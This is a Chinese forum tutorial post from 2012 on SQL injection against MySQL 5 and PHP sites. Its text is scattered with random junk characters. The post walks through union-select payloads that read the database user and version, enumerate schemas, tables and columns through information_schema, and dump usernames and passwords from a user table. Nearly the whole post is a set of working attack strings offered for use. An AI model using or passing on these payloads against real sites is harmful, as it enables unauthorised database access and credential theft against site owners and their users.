' E' [6 H7 A1 h7 T
教程内容:Mysql 5+php 注入
* {! Y3 z: D O
* m) `$ M6 F8 w. M% W/ K! J r5 d a, ^& M* `" _2 @
$ n8 p3 \6 ^8 Q3 e' {5 B! R一.查看MYSQL基本信息(库名,版本,用户)6 w: G& X9 N/ n1 l4 ^2 i8 K! ]
; B! l2 j7 a3 W( J* `3 }; ^6 o$ W
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
, ~+ C. L1 F/ ~+ w7 h8 o! H
1 n+ g) T8 @7 d8 a$ y0 h1 i二.查数据库
0 I% O, ]6 b7 e
l+ F& K/ g2 Q' `" S# w8 Qand 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*% o3 O+ R; V9 I7 H m
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。5 V1 N1 X. A) l. V) R, O+ c) v
+ g# q/ j0 V4 C# Z- J$ ^# d三.暴表$ L; f0 u: @. L) k' `5 Q
6 ^8 \! h2 ~5 I2 V1 M" B
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*+ H' a7 x* \; U* a
) X% W* D* a$ B8 f! Blimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
1 a% i( S7 r- ]
V5 I, V* D/ q5 S4 G# X' S3 r8 [; E四.暴字段- p3 \; B2 Z8 F) `; a0 O- ~5 u
3 r; i9 m# |& x' K k% ?; D" g
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
; u0 U0 F+ y# i% ~1 ]% c6 B& ]5 M2 ?- D& P) {
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。; S4 O! g& h2 _) k' T5 z
; x" K, U, N) p. v6 i* I, D
五.暴数据
" u5 f* ?1 d3 h4 N* E+ W* B1 `; l) V8 ]& U* z0 V2 Z; M" i
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*2 Q, h6 [# q3 e' b! j9 e
6 J2 n3 O$ }) G- Q ^% }/ k* `& m$ g
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。" |. d" D; Z, _# f
|
发表于 2012-9-13 16:27:53
收藏
支持
反对